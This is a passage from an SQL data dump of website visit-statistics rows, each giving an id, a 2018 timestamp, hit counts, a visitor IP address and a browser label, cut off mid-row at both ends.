36.148.199','other'),(287784,1534219092,1,0,1,0,'66.249.66.156',''),(287785,1534219123,1,1,0,0,'54.36.148.167','other'),(287786,1534219303,1,1,0,0,'178.154.171.88','other'),(287787,1534219516,1,1,0,0,'46.201.134.25','chrome'),(287788,1534219647,1,1,0,0,'66.102.9.27','chrome'),(287789,1534219897,1,1,0,0,'157.55.39.90','other'),(287790,1534219977,1,1,0,0,'54.36.148.37','other'),(287791,1534220040,1,0,1,0,'66.249.66.156',''),(287792,1534220563,1,0,1,0,'66.249.66.155',''),(287793,1534220669,1,1,0,0,'54.36.148.94','other'),(287794,1534220996,1,1,0,0,'5.9.61.101','other'),(287795,1534221138,1,1,0,0,'54.36.149.103','other'),(287796,1534221236,1,1,0,0,'157.55.39.90','other'),(287797,1534221324,1,1,0,0,'54.36.148.242','other'),(287798,1534221390,1,1,0,0,'54.36.149.57','other'),(287799,1534221864,1,1,0,0,'8.29.198.25','other'),(287800,1534222014,1,1,0,0,'216.244.66.241','other'),(287801,1534222199,1,1,0,0,'157.55.39.225','other'),(287802,1534222274,1,1,0,0,'87.250.224.66','other'),(287803,1534222538,1,1,0,0,'213.160.141.39','other'),(287804,1534222648,1,1,0,0,'54.36.148.228','other'),(287805,1534222740,1,1,0,0,'54.36.148.28','other'),(287806,1534222859,1,1,0,0,'54.36.148.10','other'),(287807,1534223145,1,0,1,0,'66.249.66.157',''),(287808,1534223306,2,0,2,0,'66.249.66.155',''),(287809,1534223432,1,1,0,0,'54.36.149.91','other'),(287810,1534223902,1,1,0,0,'54.36.148.87','other'),(287811,1534223932,1,1,0,0,'8.29.198.25','other'),(287812,1534223968,1,1,0,0,'91.121.83.160','chrome'),(287813,1534224056,1,1,0,0,'108.59.8.70','other'),(287814,1534224267,1,1,0,0,'66.102.9.29','chrome'),(287815,1534224474,1,1,0,0,'54.36.148.124','other'),(287816,1534224599,1,0,1,0,'66.249.66.157',''),(287817,1534225099,1,1,0,0,'54.36.148.82','other'),(287818,1534225178,1,1,0,0,'195.211.188.76','chrome'),(287819,1534225192,1,0,1,0,'66.249.66.155',''),(287820,1534225446,1,1,0,0,'54.36.149.23','other'),(287821,1534225480,1,1,0,0,'157.55.39.225','other'),(287822,1534225521,1,1,0,0,'54.36.148.17','other'),(287823,1534225661,1,1,0,0,'81.162.238.4','other'),(287824,1534225814,1,1,0,0,'31.13.124.119','other'),(287825,1534225831,1,1,0,0,'66.249.66.76','chrome'),(287826,1534225838,1,0,1,0,'66.249.66.74',''),(287827,1534225845,1,1,0,0,'66.249.66.156','chrome'),(287828,1534226028,1,1,0,0,'91.196.178.41','chrome'),(287829,1534226152,1,0,1,0,'66.249.66.155',''),(287830,1534226250,1,1,0,0,'54.36.148.253','other'),(287831,1534226254,1,1,0,0,'54.36.149.50','other'),(287832,1534226273,1,1,0,0,'54.36.148.165','other'),(287833,1534226292,1,1,0,0,'54.36.148.226','other'),(287834,1534226495,1,1,0,0,'54.36.148.194','other'),(287835,1534226669,1,1,0,0,'54.36.148.157','other'),(287836,1534226802,1,1,0,0,'54.36.148.198','other'),(287837,1534226818,1,0,1,0,'66.249.66.156',''),(287838,1534227075,1,1,0,0,'46.211.120.117','chrome'),(287839,1534227298,1,1,0,0,'46.211.77.231','chrome'),(287840,1534227498,1,1,0,0,'91.196.178.172','chrome'),(287841,1534227639,1,0,1,0,'66.249.66.157',''),(287842,1534227986,1,1,0,0,'91.196.178.173','chrome'),(287843,1534228045,1,1,0,0,'31.13.124.204','other'),(287844,1534228114,1,1,0,0,'37.54.21.175','chrome'),(287845,1534228186,3,3,0,0,'91.196.177.46','chrome'),(287846,1534228200,2,2,0,0,'54.36.148.15','other'),(287847,1534228422,1,1,0,0,'31.13.124.197','other'),(287848,1534228437,1,1,0,0,'54.36.148.174','other'),(287849,1534229053,1,1,0,0,'54.36.148.89','other'),(287850,1534230032,1,1,0,0,'54.36.148.144','other'),(287851,1534230134,1,1,0,0,'54.36.148.12','other'),(287852,1534230415,1,1,0,0,'54.36.148.228','other'),(287853,1534230416,1,0,1,0,'66.249.66.157',''),(287854,1534230647,1,1,0,0,'188.230.43.254','other'),(287855,1534230682,1,1,0,0,'91.237.107.33','chrome'),(287856,1534230713,1,1,0,0,'54.36.148.43','other'),(287857,1534230730,1,1,0,0,'54.36.149.105','other'),(287858,1534230833,1,0,1,0,'66.249.66.155',''),(287859,1534230868,1,1,0,0,'54.36.148.75','other'),(287860,1534230989,1,1,0,0,'54.36.149.2','other'),(287861,1534231225,1,0,1,0,'66.249.66.74',''),(287862,1534231320,1,1,0,0,'91.196.178.162','chrome'),(287863,1534231364,1,1,0,0,'91.196.178.71','chrome'),(287864,1534231542,1,1,0,0,'195.230.119.59','chrome'),(287865,1534231716,1,1,0,0,'91.196.178.84','firefox'),(287866,1534231765,1,1,0,0,'54.36.148.181','other'),(287867,1534231801,1,1,0,0,'54.36.148.91','other'),(287868,1534232159,1,1,0,0,'216.244.66.241','other'),(287869,1534232451,1,1,0,0,'37.73.253.68','chrome'),(287870,1534232550,1,1,0,0,'54.36.148.184','other'),(287871,1534232571,1,1,0,0,'195.24.137.118','chrome'),(287872,1534232589,1,1,0,0,'66.249.66.156','chrome'),(287873,1534232591,1,1,0,0,'66.249.66.74','chrome'),(287874,1534232601,1,1,0,0,'54.36.148.176','other'),(287875,1534232697,1,1,0,0,'8.29.198.25','other'),(287876,1534232734,1,1,0,0,'93.183.226.149','chrome'),(287877,1534232774,1,1,0,0,'54.36.148.82','other'),(287878,1534233048,1,1,0,0,'54.36.148.201','other'),(287879,1534233276,1,1,0,0,'54.36.148.195','other'),(287880,1534233585,1,1,0,0,'54.36.149.61','other'),(287881,1534233600,1,1,0,0,'54.36.148.218','other'),(287882,1534233652,1,1,0,0,'91.121.83.160','chrome'),(287883,1534233733,1,1,0,0,'54.36.149.14','other'),(287884,1534233792,1,0,1,0,'66.249.66.157',''),(287885,1534233871,1,1,0,0,'54.36.148.196','other'),(287886,1534233924,1,1,0,0,'54.36.148.107','other'),(287887,1534234308,1,1,0,0,'91.196.178.129','chrome'),(287888,1534234355,1,1,0,0,'157.55.39.90','other'),(287889,1534234388,1,1,0,0,'54.36.148.128','other'),(287890,1534234777,1,1,0,0,'8.29.198.25','other'),(287891,1534234926,1,1,0,0,'66.102.9.38','chrome'),(287892,1534234928,1,1,0,0,'54.36.149.74','other'),(287893,1534235138,1,1,0,0,'54.36.149.25','other'),(287894,1534235336,1,1,0,0,'77.111.244.48','chrome'),(287895,1534235838,1,1,0,0,'54.36.148.99','other'),(287896,1534235944,1,1,0,0,'54.36.148.104','other'),(287897,1534236027,1,1,0,0,'91.196.178.71','chrome'),(287898,1534236104,1,1,0,0,'91.196.178.169','chrome'),(287899,1534236358,1,1,0,0,'54.36.148.12','other'),(287900,1534236424,1,1,0,0,'54.36.148.190','other'),(287901,1534236522,1,1,0,0,'91.196.178.81','firefox'),(287902,1534236526,1,1,0,0,'54.36.148.161','other'),(287903,1534236733,1,1,0,0,'91.196.178.135','other'),(287904,1534236963,1,0,1,0,'66.249.66.155',''),(287905,1534237434,1,0,1,0,'66.249.66.157',''),(287906,1534237445,1,1,0,0,'54.36.148.168','other'),(287907,1534237488,1,1,0,0,'54.36.148.228','other'),(287908,1534237497,1,1,0,0,'216.244.66.241','other'),(287909,1534237817,1,1,0,0,'54.36.148.107','other'),(287910,1534237907,1,1,0,0,'54.36.148.217','other'),(287911,1534237980,1,0,1,0,'66.249.66.75',''),(287912,1534238143,1,1,0,0,'66.249.66.76','chrome'),(287913,1534238147,1,1,0,0,'66.249.66.157','chrome'),(287914,1534238287,1,1,0,0,'91.196.179.138','chrome'),(287915,1534238305,1,1,0,0,'91.196.177.46','chrome'),(287916,1534238390,1,1,0,0,'54.36.148.38','other'),(287917,1534238541,1,1,0,0,'91.196.178.99','chrome'),(287918,1534238592,1,1,0,0,'91.196.178.71','chrome'),(287919,1534238738,1,1,0,0,'54.36.148.154','other'),(287920,1534238743,1,1,0,0,'91.196.178.81','firefox'),(287921,1534239582,1,1,0,0,'91.196.177.46','chrome'),(287922,1534239706,1,1,0,0,'91.196.179.138','chrome'),(287923,1534239842,1,1,0,0,'91.196.178.99','chrome'),(287924,1534239930,1,1,0,0,'54.36.148.75','other'),(287925,1534240163,1,1,0,0,'54.36.148.206','other'),(287926,1534240404,1,1,0,0,'54.36.149.79','other'),(287927,1534240973,1,1,0,0,'91.196.178.102','chrome'),(287928,1534241408,3,3,0,0,'195.10.210.70','chrome'),(287929,1534241667,1,1,0,0,'54.36.149.82','other'),(287930,1534242032,1,1,0,0,'54.36.148.157','other'),(287931,1534242490,1,1,0,0,'54.36.149.6','other'),(287932,1534242615,1,1,0,0,'54.36.148.203','other'),(287933,1534242631,1,1,0,0,'54.36.148.185','other'),(287934,1534242698,1,1,0,0,'141.8.132.22','other'),(287935,1534243043,12,12,0,0,'40.77.167.65','other'),(287936,1534243051,1,1,0,0,'54.36.148.36','other'),(287937,1534243055,15,15,0,0,'40.77.167.70','other'),(287938,1534243094,25,25,0,0,'157.55.39.225','other'),(287939,1534243376,1,1,0,0,'54.36.148.197','other'),(287940,1534243426,1,0,1,0,'66.249.66.157',''),(287941,1534243550,1,1,0,0,'8.29.198.25','other'),(287942,1534243590,1,1,0,0,'54.36.148.173','other'),(287943,1534243674,1,1,0,0,'54.36.148.255','other'),(287944,1534243833,1,1,0,0,'54.36.148.130','other'),(287945,1534244082,1,1,0,0,'173.252.93.18','other'),(287946,1534244123,1,1,0,0,'79.110.131.222','other'),(287947,1534244161,1,0,1,0,'66.249.66.155',''),(287948,1534244223,1,1,0,0,'54.36.148.57','other'),(287949,1534244310,1,1,0,0,'193.239.74.158','chrome'),(287950,1534244408,1,1,0,0,'40.77.167.70','other'),(287951,1534244440,1,1,0,0,'54.36.148.68','other'),(287952,1534244687,1,1,0,0,'54.36.148.131','other'),(287953,1534244989,1,1,0,0,'54.36.148.154','other'),(287954,1534245075,1,1,0,0,'54.36.148.126','other'),(287955,1534245104,1,1,0,0,'66.102.9.136','chrome'),(287956,1534245230,1,1,0,0,'91.196.178.174','chrome'),(287957,1534245348,1,1,0,0,'54.36.148.38','other'),(287958,1534245569,1,1,0,0,'54.36.148.199','other'),(287959,1534245663,1,1,0,0,'8.29.198.27','other'),(287960,1534245890,1,1,0,0,'80.252.153.33','firefox'),(287961,1534245938,1,1,0,0,'54.36.148.201','other'),(287962,1534245971,1,1,0,0,'54.36.148.18','other'),(287963,1534246038,1,0,1,0,'66.249.66.157',''),(287964,1534246040,1,0,1,0,'66.249.66.155',''),(287965,1534246078,2,2,0,0,'91.196.178.71','chrome'),(287966,1534246172,1,1,0,0,'54.36.148.130','other'),(287967,1534246410,1,1,0,0,'54.36.149.65','other'),(287968,1534246658,1,1,0,0,'54.36.148.98','other'),(287969,1534246773,1,1,0,0,'54.36.148.67','other'),(287970,1534247116,1,1,0,0,'91.196.178.134','other'),(287971,1534247117,1,1,0,0,'54.36.148.170','other'),(287972,1534247237,1,0,1,0,'66.249.66.156',''),(287973,1534247308,1,1,0,0,'54.36.148.137','other'),(287974,1534247349,1,1,0,0,'31.134.113.41','chrome'),(287975,1534247482,1,1,0,0,'54.36.148.81','other'),(287976,1534247488,1,1,0,0,'37.9.113.115','other'),(287977,1534247606,1,0,1,0,'66.249.66.155',''),(287978,1534247954,1,1,0,0,'91.196.178.48','other'),(287979,1534248530,1,1,0,0,'54.36.149.100','other'),(287980,1534248613,1,1,0,0,'54.36.148.101','other'),(287981,1534248662,1,1,0,0,'66.249.66.76','chrome'),(287982,1534248666,1,1,0,0,'66.249.66.157','chrome'),(287983,1534248887,1,1,0,0,'54.36.148.57','other'),(287984,1534248928,1,1,0,0,'54.36.149.7','other'),(287985,1534248998,1,1,0,0,'54.36.148.49','other'),(287986,1534249700,1,1,0,0,'54.36.149.11','other'),(287987,1534249755,1,1,0,0,'54.36.148.229','other'),(287988,1534249855,1,1,0,0,'54.36.148.32','other'),(287989,1534249864,1,0,1,0,'66.249.66.156',''),(287990,1534249948,1,1,0,0,'77.222.133.194','firefox'),(287991,1534250104,1,1,0,0,'54.36.149.14','other'),(287992,1534250192,1,1,0,0,'54.36.148.16','other'),(287993,1534250194,1,0,1,0,'66.249.66.157',''),(287994,1534250348,1,1,0,0,'54.36.148.201','other'),(287995,1534250684,1,1,0,0,'54.36.148.159','other'),(287996,1534250768,1,1,0,0,'54.36.148.139','other'),(287997,1534250943,1,1,0,0,'54.36.149.66','other'),(287998,1534251086,1,1,0,0,'54.36.149.42','other'),(287999,1534251104,1,0,1,0,'66.249.66.157',''),(288000,1534251403,1,1,0,0,'54.208.102.37','other'),(288001,1534251744,1,1,0,0,'54.36.148.247','other'),(288002,1534251787,1,1,0,0,'77.111.244.45','chrome'),(288003,1534252083,1,1,0,0,'195.10.210.70','chrome'),(288004,1534252151,1,1,0,0,'216.244.66.241','other'),(288005,1534252191,1,1,0,0,'31.134.113.41','chrome'),(288006,1534252344,1,0,1,0,'66.249.66.74',''),(288007,1534252544,1,0,1,0,'66.249.66.156',''),(288008,1534252569,1,1,0,0,'157.55.39.90','other'),(288009,1534252589,1,1,0,0,'66.249.66.75','chrome'),(288010,1534252596,1,1,0,0,'66.249.66.157','chrome'),(288011,1534252834,1,1,0,0,'54.36.148.162','other'),(288012,1534253121,1,1,0,0,'37.9.113.115','other'),(288013,1534253405,1,1,0,0,'216.244.66.241','other'),(288014,1534253427,1,1,0,0,'95.158.62.242','chrome'),(288015,1534253435,3,3,0,0,'91.196.178.81','firefox'),(288016,1534253583,1,1,0,0,'54.36.148.87','other'),(288017,1534253647,1,1,0,0,'54.36.149.50','other'),(288018,1534253789,1,1,0,0,'54.36.148.209','other'),(288019,1534254351,1,1,0,0,'54.36.149.4','other'),(288020,1534254445,1,1,0,0,'8.29.198.25','other'),(288021,1534254819,2,2,0,0,'216.244.66.241','other'),(288022,1534254866,1,1,0,0,'213.5.192.79','chrome'),(288023,1534254887,1,1,0,0,'95.132.13.177','firefox'),(288024,1534255516,1,0,1,0,'66.249.66.156',''),(288025,1534255588,1,1,0,0,'54.36.148.147','other'),(288026,1534255826,1,1,0,0,'216.244.66.241','other'),(288027,1534256111,1,1,0,0,'54.36.148.158','other'),(288028,1534256304,1,1,0,0,'46.211.40.107','other'),(288029,1534256425,1,1,0,0,'54.36.149.100','other'),(288030,1534256534,1,1,0,0,'8.29.198.27','other'),(288031,1534256586,1,1,0,0,'54.36.148.209','other'),(288032,1534256687,2,2,0,0,'141.8.142.74','other'),(288033,1534257731,1,1,0,0,'54.36.148.99','other'),(288034,1534257899,1,1,0,0,'54.36.149.66','other'),(288035,1534257915,1,1,0,0,'91.196.178.71','firefox'),(288036,1534258078,1,1,0,0,'40.77.167.70','other'),(288037,1534258392,1,1,0,0,'54.36.148.186','other'),(288038,1534258467,1,1,0,0,'54.36.148.81','other'),(288039,1534258551,1,1,0,0,'216.244.66.241','other'),(288040,1534258561,2,2,0,0,'141.8.142.74','other'),(288041,1534258634,1,1,0,0,'62.205.134.182','msie'),(288042,1534258649,1,1,0,0,'54.36.149.7','other'),(288043,1534258668,1,1,0,0,'54.36.149.68','other'),(288044,1534258824,1,1,0,0,'54.36.148.185','other'),(288045,1534259139,1,1,0,0,'54.36.149.77','other'),(288046,1534259183,1,1,0,0,'54.36.148.156','other'),(288047,1534259677,1,1,0,0,'40.77.167.70','other'),(288048,1534259740,1,1,0,0,'163.172.4.153','firefox'),(288049,1534260309,1,1,0,0,'87.250.224.46','other'),(288050,1534260625,1,1,0,0,'54.36.148.203','other'),(288051,1534260725,1,1,0,0,'92.113.190.168','chrome'),(288052,1534260851,1,1,0,0,'54.36.148.194','other'),(288053,1534261026,1,1,0,0,'54.36.148.200','other'),(288054,1534261135,1,1,0,0,'141.8.142.74','other'),(288055,1534261349,1,1,0,0,'54.36.148.201','other'),(288056,1534261367,1,1,0,0,'54.36.149.44','other'),(288057,1534261378,1,1,0,0,'130.180.216.142','chrome'),(288058,1534262116,4,4,0,0,'62.210.157.95','other'),(288059,1534262119,1,1,0,0,'54.36.149.59','other'),(288060,1534262184,1,1,0,0,'216.244.66.241','other'),(288061,1534262199,1,1,0,0,'54.36.149.16','other'),(288062,1534262210,1,1,0,0,'54.36.148.100','other'),(288063,1534262475,1,1,0,0,'54.36.149.52','other'),(288064,1534262521,1,1,0,0,'54.36.148.62','other'),(288065,1534262935,1,1,0,0,'178.154.171.88','other'),(288066,1534263156,1,1,0,0,'178.154.200.41','other'),(288067,1534263363,1,1,0,0,'54.36.148.25','other'),(288068,1534263510,1,1,0,0,'54.36.148.167','other'),(288069,1534264105,1,1,0,0,'141.8.142.74','other'),(288070,1534264500,1,1,0,0,'54.36.148.141','other'),(288071,1534264799,1,1,0,0,'216.244.66.241','other'),(288072,1534264824,1,1,0,0,'37.9.113.182','other'),(288073,1534264838,1,1,0,0,'54.36.149.102','other'),(288074,1534265325,1,1,0,0,'8.29.198.26','other'),(288075,1534265765,1,1,0,0,'54.36.148.42','other'),(288076,1534265824,1,1,0,0,'37.9.113.182','other'),(288077,1534265825,2,2,0,0,'37.55.57.172','chrome'),(288078,1534265963,1,1,0,0,'54.36.148.129','other'),(288079,1534266057,1,1,0,0,'54.36.148.205','other'),(288080,1534266511,1,1,0,0,'54.36.148.199','other'),(288081,1534267153,1,1,0,0,'54.36.149.13','other'),(288082,1534267208,1,1,0,0,'54.36.148.65','other'),(288083,1534267380,1,1,0,0,'8.29.198.27','other'),(288084,1534267487,1,1,0,0,'91.196.178.169','chrome'),(288085,1534268071,1,1,0,0,'54.36.148.105','other'),(288086,1534268935,1,1,0,0,'37.73.51.111','chrome'),(288087,1534269060,1,1,0,0,'92.113.189.235','chrome'),(288088,1534269211,1,1,0,0,'54.36.149.74','other'),(288089,1534269425,2,2,0,0,'141.8.142.74','other'),(288090,1534269511,1,1,0,0,'77.111.244.42','chrome'),(288091,1534269523,1,1,0,0,'54.36.148.186','other'),(288092,1534270020,1,1,0,0,'54.36.148.173','other'),(288093,1534270161,1,0,1,0,'66.249.66.157',''),(288094,1534270557,2,2,0,0,'167.114.219.41','other'),(288095,1534270619,1,1,0,0,'141.8.142.74','other'),(288096,1534270677,1,1,0,0,'54.36.148.31','other'),(288097,1534270738,1,1,0,0,'77.111.244.42','chrome'),(288098,1534271004,1,1,0,0,'54.36.148.29','other'),(288099,1534271468,1,1,0,0,'146.0.86.66','other'),(288100,1534271685,1,1,0,0,'54.36.149.56','other'),(288101,1534272026,1,0,1,0,'66.249.66.75',''),(288102,1534272111,1,1,0,0,'91.196.178.171','chrome'),(288103,1534272360,1,1,0,0,'193.194.127.228','chrome'),(288104,1534272865,1,1,0,0,'91.196.178.176','other'),(288105,1534273060,1,1,0,0,'54.36.148.57','other'),(288106,1534273168,1,1,0,0,'54.36.148.152','other'),(288107,1534273479,1,1,0,0,'78.111.186.158','chrome'),(288108,1534273499,1,1,0,0,'54.36.148.108','other'),(288109,1534273552,1,1,0,0,'207.46.13.61','other'),(288110,1534273681,1,0,1,0,'66.249.66.74',''),(288111,1534273687,1,0,1,0,'66.249.66.75',''),(288112,1534273731,1,1,0,0,'54.36.148.122','other'),(288113,1534273886,1,0,1,0,'66.249.66.76',''),(288114,1534273903,1,0,1,0,'66.249.66.157',''),(288115,1534273930,1,1,0,0,'95.132.39.132','chrome'),(288116,1534274057,1,1,0,0,'157.55.39.90','other'),(288117,1534274487,1,1,0,0,'54.36.148.68','other'),(288118,1534274690,1,1,0,0,'216.244.66.241','other'),(288119,1534274788,2,2,0,0,'141.8.142.74','other'),(288120,1534274824,1,1,0,0,'54.36.148.48','other'),(288121,1534275145,1,1,0,0,'54.36.148.76','other'),(288122,1534276183,1,1,0,0,'8.29.198.27','other'),(288123,1534276670,1,1,0,0,'54.36.148.165','other'),(288124,1534277012,1,1,0,0,'46.211.49.4','other'),(288125,1534277173,1,1,0,0,'54.36.148.97','other'),(288126,1534277562,1,1,0,0,'141.8.142.74','other'),(288127,1534277573,1,1,0,0,'37.73.136.221','other'),(288128,1534277793,1,1,0,0,'54.36.149.57','other'),(288129,1534277955,1,1,0,0,'54.36.148.67','other'),(288130,1534278047,1,1,0,0,'54.36.148.96','other'),(288131,1534278231,1,1,0,0,'8.29.198.27','other'),(288132,1534278272,1,1,0,0,'54.36.148.41','other'),(288133,1534278484,1,1,0,0,'40.77.167.193','other'),(288134,1534278544,1,1,0,0,'216.244.66.241','other'),(288135,1534278741,1,1,0,0,'54.36.148.74','other'),(288136,1534278808,1,1,0,0,'157.55.39.90','other'),(288137,1534278836,1,1,0,0,'54.36.149.93','other'),(288138,1534279073,1,1,0,0,'40.77.167.70','other'),(288139,1534279273,1,1,0,0,'54.36.148.25','other'),(288140,1534279642,1,1,0,0,'54.36.148.140','other'),(288141,1534279933,1,1,0,0,'54.36.148.129','other'),(288142,1534280366,1,1,0,0,'54.36.148.52','other'),(288143,1534280659,1,1,0,0,'54.36.148.204','other'),(288144,1534280783,1,1,0,0,'95.132.36.3','chrome'),(288145,1534280871,1,1,0,0,'54.36.149.54','other'),(288146,1534281231,1,0,1,0,'66.249.66.155',''),(288147,1534281236,1,1,0,0,'191.96.249.110','chrome'),(288148,1534281385,1,1,0,0,'54.36.149.63','other'),(288149,1534281512,1,1,0,0,'54.36.149.107','other'),(288150,1534281842,1,1,0,0,'157.55.39.90','other'),(288151,1534282090,1,1,0,0,'54.36.148.200','other'),(288152,1534282440,2,2,0,0,'141.8.142.74','other'),(288153,1534282518,1,1,0,0,'91.196.177.11','other'),(288154,1534282654,1,1,0,0,'54.36.148.235','other'),(288155,1534282702,1,1,0,0,'54.36.148.121','other'),(288156,1534282855,1,1,0,0,'54.36.148.239','other'),(288157,1534282893,1,1,0,0,'40.77.167.70','other'),(288158,1534283019,1,1,0,0,'216.244.66.241','other'),(288159,1534283291,1,1,0,0,'91.196.178.136','other'),(288160,1534283404,1,1,0,0,'54.36.148.114','other'),(288161,1534283677,1,1,0,0,'157.55.39.90','other'),(288162,1534283684,1,1,0,0,'54.36.149.106','other'),(288163,1534283970,1,1,0,0,'54.36.149.5','other'),(288164,1534284275,1,1,0,0,'54.36.149.25','other'),(288165,1534284561,1,1,0,0,'54.36.148.63','other'),(288166,1534284778,1,0,1,0,'66.249.66.155',''),(288167,1534284831,1,1,0,0,'54.36.149.84','other'),(288168,1534285602,1,1,0,0,'178.154.171.88','other'),(288169,1534285725,1,1,0,0,'95.163.255.93','other'),(288170,1534285754,1,1,0,0,'54.36.149.44','other'),(288171,1534286080,1,1,0,0,'54.36.148.145','other'),(288172,1534286269,1,1,0,0,'216.244.66.241','other'),(288173,1534286342,1,1,0,0,'54.36.148.118','other'),(288174,1534286793,1,1,0,0,'51.255.65.46','other'),(288175,1534286840,1,1,0,0,'54.36.148.173','other'),(288176,1534286902,1,1,0,0,'54.36.148.122','other'),(288177,1534287034,1,1,0,0,'8.29.198.27','other'),(288178,1534287432,1,0,1,0,'66.249.66.155',''),(288179,1534287511,1,1,0,0,'54.36.148.135','other'),(288180,1534287525,1,1,0,0,'54.36.148.23','other'),(288181,1534287554,1,0,1,0,'66.249.66.76',''),(288182,1534287903,1,1,0,0,'193.106.30.99','firefox'),(288183,1534288155,1,1,0,0,'54.36.149.224','other'),(288184,1534288181,1,1,0,0,'216.244.66.241','other'),(288185,1534288441,1,1,0,0,'54.36.148.187','other'),(288186,1534288946,1,1,0,0,'54.36.148.254','other'),(288187,1534289031,1,1,0,0,'54.36.148.200','other'),(288188,1534289082,1,1,0,0,'8.29.198.26','other'),(288189,1534289098,1,1,0,0,'54.36.148.143','other'),(288190,1534289285,1,1,0,0,'54.36.148.72','other'),(288191,1534289360,1,1,0,0,'54.36.149.92','other'),(288192,1534289577,1,1,0,0,'54.36.148.178','other'),(288193,1534290473,1,1,0,0,'54.36.148.173','other'),(288194,1534290718,1,1,0,0,'54.36.148.106','other'),(288195,1534290724,1,1,0,0,'141.8.142.74','other'),(288196,1534290988,1,1,0,0,'13.77.169.115','other'),(288197,1534291136,1,1,0,0,'54.36.149.0','other'),(288198,1534292187,1,1,0,0,'54.36.148.252','other'),(288199,1534292295,1,0,1,0,'66.249.66.155',''),(288200,1534292310,2,1,1,0,'66.249.66.75',''),(288201,1534292326,1,1,0,0,'66.249.66.155','chrome'),(288202,1534292406,1,1,0,0,'54.36.148.53','other'),(288203,1534292460,1,1,0,0,'54.36.148.55','other'),(288204,1534292501,1,1,0,0,'95.163.255.102','other'),(288205,1534292669,1,1,0,0,'157.55.39.90','other'),(288206,1534292715,1,1,0,0,'54.36.149.7','other'),(288207,1534292946,1,1,0,0,'180.76.15.6','other'),(288208,1534292958,1,1,0,0,'54.36.148.172','other'),(288209,1534293857,1,1,0,0,'54.36.148.61','other'),(288210,1534293976,1,0,1,0,'66.249.66.74',''),(288211,1534294544,1,1,0,0,'40.77.167.110','other'),(288212,1534294944,1,1,0,0,'157.55.39.90','other'),(288213,1534296214,1,1,0,0,'54.36.148.210','other'),(288214,1534296466,1,1,0,0,'54.36.148.182','other'),(288215,1534296616,1,1,0,0,'40.77.167.193','other'),(288216,1534296739,1,1,0,0,'178.154.200.73','other'),(288217,1534297399,1,1,0,0,'52.41.211.72','chrome'),(288218,1534297649,1,1,0,0,'54.36.148.195','other'),(288219,1534297866,1,1,0,0,'54.36.149.30','other'),(288220,1534297879,1,1,0,0,'8.29.198.25','other'),(288221,1534298049,1,1,0,0,'40.77.167.70','other'),(288222,1534298104,1,1,0,0,'54.36.148.251','other'),(288223,1534298127,1,1,0,0,'54.36.148.220','other'),(288224,1534298290,1,1,0,0,'54.36.148.156','other'),(288225,1534298412,1,1,0,0,'141.8.142.74','other'),(288226,1534298449,1,1,0,0,'54.36.148.78','other'),(288227,1534299274,1,0,1,0,'66.249.66.157',''),(288228,1534299401,1,1,0,0,'54.36.149.51','other'),(288229,1534299525,1,0,1,0,'66.249.66.76',''),(288230,1534299537,1,1,0,0,'54.36.148.225','other'),(288231,1534299810,1,1,0,0,'54.36.148.85','other'),(288232,1534299937,1,1,0,0,'8.29.198.27','other'),(288233,1534300671,1,1,0,0,'216.244.66.241','other'),(288234,1534301064,1,1,0,0,'54.36.148.159','other'),(288235,1534301110,1,1,0,0,'54.36.148.33','other'),(288236,1534301927,1,1,0,0,'178.154.171.88','other'),(288237,1534302135,1,1,0,0,'54.36.148.22','other'),(288238,1534302149,15,15,0,0,'69.30.213.82','other'),(288239,1534302356,1,1,0,0,'54.36.148.181','other'),(288240,1534302627,1,1,0,0,'54.36.149.54','other'),(288241,1534302917,1,1,0,0,'54.36.148.197','other'),(288242,1534303145,1,1,0,0,'54.36.148.73','other'),(288243,1534303543,1,1,0,0,'54.36.149.88','other'),(288244,1534303826,1,1,0,0,'92.113.189.235','chrome'),(288245,1534303844,1,1,0,0,'54.36.148.223','other'),(288246,1534303865,1,1,0,0,'66.249.66.157','chrome'),(288247,1534304627,2,2,0,0,'141.8.142.74','other'),(288248,1534305015,1,1,0,0,'157.55.39.90','other'),(288249,1534305283,1,1,0,0,'95.24.92.65','other'),(288250,1534305593,1,1,0,0,'178.154.171.88','other'),(288251,1534305741,1,1,0,0,'54.36.148.30','other'),(288252,1534305809,2,2,0,0,'216.244.66.241','other'),(288253,1534306099,1,1,0,0,'54.36.148.202','other'),(288254,1534306558,1,1,0,0,'54.36.148.37','other'),(288255,1534306768,1,1,0,0,'54.36.149.79','other'),(288256,1534307189,1,1,0,0,'141.8.142.74','other'),(288257,1534307397,1,1,0,0,'54.36.148.31','other'),(288258,1534307425,1,1,0,0,'54.36.148.115','other'),(288259,1534307647,2,2,0,0,'54.36.148.96','other'),(288260,1534307901,1,1,0,0,'54.36.148.223','other'),(288261,1534308725,1,1,0,0,'8.29.198.27','other'),(288262,1534309039,1,1,0,0,'54.36.148.19','other'),(288263,1534309395,1,1,0,0,'54.36.148.255','other'),(288264,1534309522,1,1,0,0,'91.196.178.88','chrome'),(288265,1534309943,1,1,0,0,'54.36.148.144','other'),(288266,1534309990,1,1,0,0,'178.154.171.88','other'),(288267,1534310180,1,1,0,0,'54.36.148.20','other'),(288268,1534310405,1,1,0,0,'54.36.148.83','other'),(288269,1534310775,1,1,0,0,'8.29.198.26','other'),(288270,1534310900,1,1,0,0,'54.36.149.35','other'),(288271,1534310963,1,1,0,0,'54.36.148.125','other'),(288272,1534311030,1,1,0,0,'54.36.148.94','other'),(288273,1534311066,1,1,0,0,'54.36.148.157','other'),(288274,1534311532,1,1,0,0,'54.36.148.171','other'),(288275,1534311750,1,1,0,0,'95.132.31.31','chrome'),(288276,1534312051,1,1,0,0,'54.36.149.66','other'),(288277,1534312393,1,1,0,0,'141.8.142.74','other'),(288278,1534312520,1,0,1,0,'66.249.66.156',''),(288279,1534312568,1,1,0,0,'54.36.148.248','other'),(288280,1534312700,1,1,0,0,'95.132.20.19','other'),(288281,1534312872,4,4,0,0,'136.243.37.219','other'),(288282,1534312886,1,1,0,0,'54.36.148.138','other'),(288283,1534313275,1,0,1,0,'66.249.66.78',''),(288284,1534313675,1,1,0,0,'54.36.149.3','other'),(288285,1534313798,1,1,0,0,'54.36.149.6','other'),(288286,1534313844,1,1,0,0,'46.211.6.217','other'),(288287,1534314063,1,1,0,0,'54.36.148.40','other'),(288288,1534314319,1,1,0,0,'91.196.178.190','chrome'),(288289,1534314351,1,1,0,0,'54.36.148.244','other'),(288290,1534314450,1,1,0,0,'141.8.142.74','other'),(288291,1534314519,1,1,0,0,'91.196.179.134','chrome'),(288292,1534315182,1,1,0,0,'91.209.11.179','firefox'),(288293,1534315525,1,1,0,0,'54.36.149.88','other'),(288294,1534315553,1,1,0,0,'54.36.148.48','other'),(288295,1534315896,1,1,0,0,'62.205.134.182','msie'),(288296,1534315932,1,1,0